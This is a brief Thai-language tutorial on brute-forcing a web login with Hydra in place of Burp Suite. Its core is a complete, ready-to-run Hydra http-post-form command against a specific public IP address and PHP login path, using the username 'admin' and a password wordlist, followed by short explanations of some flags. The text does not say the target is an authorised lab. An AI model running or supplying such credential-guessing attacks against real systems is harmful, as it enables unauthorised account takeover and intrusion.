การใช้ hydra ในการ brute force password

โดยเราจะมาใช้ hydra ในการ brute force password แทน burp suite กัน เพราะว่า burpsuite แบบฟรี มีการ limit banwidth ละนะ

โอเค เริ่มจากการหา path ในการ brute force โดยเราจะใช้ burp suite proxy

โอเค จากนั้นเราจะใช้ path นั้นใน hydra ดังนี้

hydra -l admin -P share 34.124.155.224 -s 80 http-post-form "/app_client.php:email=^USER^&password=^PASS^&submit=:F=index.php" -v -f -e nsr 

โดย

-l = user
share = ชื่อ file wordlist
:F=index.php = บอกว่าการ login ไม่สำเร็จ จะไปที่ path index.php